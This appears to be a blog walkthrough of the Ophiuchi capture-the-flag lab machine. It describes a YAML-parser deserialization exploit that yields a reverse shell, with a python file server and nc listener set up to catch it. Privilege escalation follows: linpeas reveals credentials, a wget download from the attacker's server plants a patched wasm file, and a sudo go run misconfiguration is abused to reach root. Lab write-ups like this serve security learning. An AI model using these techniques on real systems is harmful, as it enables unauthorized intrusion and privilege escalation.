In this post, i would like to share a walkthrough of the Ophiuchi Machine.

This room has been considered difficulty rated as a MEDIUM machine

Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Information Gathering on Ophiuchi

Let’s open the browser and straight into the website interface.

We have the online yaml parser, but we cannot do anything here yet. Let’s run the gobuster in case we find anything useful there.

While gobuster is running, let’s move on to the next step by finding what is yaml-payload exploit is. We found this page and let’s download it on our machine.

We found one article that might be useful to us in the later activity

What we can do next is modify the AwesomeScriptingEngineFactory.java that stored in yaml-payload/src/artsploit directory

We also need to save the bash reverse shell on the directory so that we can use it later.

While modifying the file, let’s check on the gobuster result whether there’s any interesting found there.

We will have to compile the java file by using javac command but sadly it doesn’t work without the sudo

It works!

The result will look something such to the screenshot above.

Let’s compile everything into .jar file format with the command jar -cvf yaml-payload.jar src/ .

As usual, it needs sudo

Once it has completed the compilation, it will look exactly like the screenshot above.

Let’s run the python server to transfer the file so that we can execute the nc listener

We also need to start the nc listener for us to get the reverse shell connection back to us.

Playing the online yaml parser

For everything to happen smoothly, we need to try the command above for it to execute well.

The error above shows that we missed any lines on the command. However, let’s try again with the same step as above.

The transfer is working as i planned

We got the reverse shell connection back to us. So, let’s get the user flag on /home/admin

Sadly, we don’t have permission to read the user flag yet.

Enumerate with the linpeas on Ophiuchi machine

Let’s transfer the linpeas.sh into the target’s machine

Once we have successfully transferred it, we need to give permission of linpeas.sh to chmod +x linpeas.sh

On the linpeas.sh result, we found the password of username= admin. Let’s key-in the password we found here to get admin privileges and access

We successfully have login as admin, and we can read the user flag that stored at /home/admin/ directory

Escalate to Root Privileges Access on the Ophiuchi machine

Let’s escalate from user admin to root but we need to see anything that we can use by executing sudo -l.

I stuck from here onwards and get some advice around. Thanks to P3R5EU5 that have guided me along the way

Let’s research the .go file on the internet and we found an article under webassembly

On the website, it said as follows:

WebAssembly encodes a low-level, assembly-like programming language. This language is structured around the following concepts

We can see the source code by executing cat /opt/wasm-functions/index.go

I need to transfer main.wasm file on the same directory to our own machine to decode it

We have two options to decode this either using command or browser which i will use the browser instead here.

We need to upload the main.wasm to modify the file from (i32.const. 0)) to (i32.const. 1))

We need to copy-paste the wasm file that we manage to modify to this website and download the test.wasm file into our machine. Now, we need to transfer the main.wasm into the target’s machine by using python3 -m http.server 4444

For us transferring the file into the target’s machine, we can use the command wget http://<ip address>:<port>/main.wasm

We need to give execute permission to the main.wasm

We need to move the file to /home/admin by mv /dev/shm/main.wasm .

Aside from that, we also need to create deploy.sh where i have included cat /root/root.txt

We also can use the command sudo /usr/bin/go run /opt/wasm-functions/index.go

-THE END-

Happy Learning Guys!

Leave a Reply

Your email address will not be published. Required fields are marked *